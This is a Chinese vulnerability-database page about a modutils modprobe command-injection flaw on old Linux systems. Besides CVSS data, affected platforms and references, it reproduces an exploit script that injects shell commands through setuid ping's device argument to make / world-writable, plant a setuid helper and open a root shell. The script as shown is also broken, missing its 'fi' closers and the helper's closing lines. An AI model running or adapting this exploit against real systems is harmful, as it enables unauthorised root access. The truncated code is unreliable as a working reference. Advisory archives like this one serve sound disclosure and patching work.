发布时间 :2001-01-09 00:00:00
修订时间 :2008-09-05 16:22:38

[原文]modprobe in the modutils 2.3.x package on Linux systems allows a local user to execute arbitrary commands via shell metacharacters.


        Linux系统modutils 2.3.x包的modprobe存在漏洞。本地用户可以借助shell元字符执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:suse:suse_linux:7.0SuSE SuSE Linux 7.0
cpe:/o:conectiva:linux:5.1Conectiva Conectiva Linux 5.1
cpe:/o:mandrakesoft:mandrake_linux:7.2MandrakeSoft Mandrake Linux 7.2
cpe:/o:suse:suse_linux:6.4SuSE SuSE Linux 6.4
cpe:/o:redhat:linux:7.0Red Hat Linux 7.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  XF  linux-modprobe-execute-code
(UNKNOWN)  DEBIAN  20001120 modutils: local exploit
(UNKNOWN)  SUSE  SuSE-SA:2000:44
(UNKNOWN)  BUGTRAQ  20001112 RedHat 7.0 (and SuSE): modutils + netkit = root compromise. (fwd)

- 漏洞信息

高危 未知
2001-01-09 00:00:00 2006-09-15 00:00:00
        Linux系统modutils 2.3.x包的modprobe存在漏洞。本地用户可以借助shell元字符执行任意命令。

- 公告与补丁


- 漏洞信息 (20402)

Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability (EDBID:20402)
linux local
2000-11-12 Verified
0 Michal Zalewski
N/A [点击下载]
source :

Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise.

The problem has to do with modprobe using popen() to execute the "echo" program argumented with user input. Because popen() relies on /bin/sh to parse the command string and execute "echo", unescaped shell metacharacters can be included in user input to execute other commands.

Though modprobe is not installed setuid root, this vulnerability can be exploited to gain root access provided the target system is using kmod. Kmod is a kernel facility that automatically executes the program 'modprobe' when a module is requested via request_module().

One program that does this is the version of ping that ships with RedHat Linux 7.0. When a device is specified at the command-line that doesnt exist, request_module is called with the user-supplied arguments passed to the kernel. The kernel then takes the arguments and exec's modprobe with them. Arbitrary commands included in the argument for module name (device name to ping) are then executed when popen() is called as root.

Successful exploitation of this will yield root access for the attacker.


echo "RedHat 7.0 modutils exploit"
echo "(c) 2000 Michal Zalewski <>"
echo "Bug discovery: Sebastian Krahmer <>"
echo "Do not have to work on older / non-RH systems. This bug has been"
echo "introduced recently. Enjoy :)"
echo "This exploit is really hackish, because slashes are not allowed in"
echo "modprobe parameters, thus we have to play in modprobe's cwd (/)."

test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Sorry, no setuid ping."
  exit 0

echo "Phase 1: making / world-writable..."

$PING -I ';chmod o+w .' &>/dev/null

sleep 1

echo "Phase 2: compiling helper application in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");

gcc /x.c -o /x
chmod 755 /x

echo "Phase 3: chown+chmod on our helper application..."

$PING -I ';chown 0 x' &>/dev/null
sleep 1
$PING -I ';chmod +s x' &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Apparently, this is not exploitable on this system :("
  exit 1

echo "Voila! Entering rootshell..."


echo "Thank you."		

- 漏洞信息

Linux modprobe popen Function Arbitrary Command Execution
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-11-12 Unknow
2000-11-12 Unknow

- 解决方案


Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete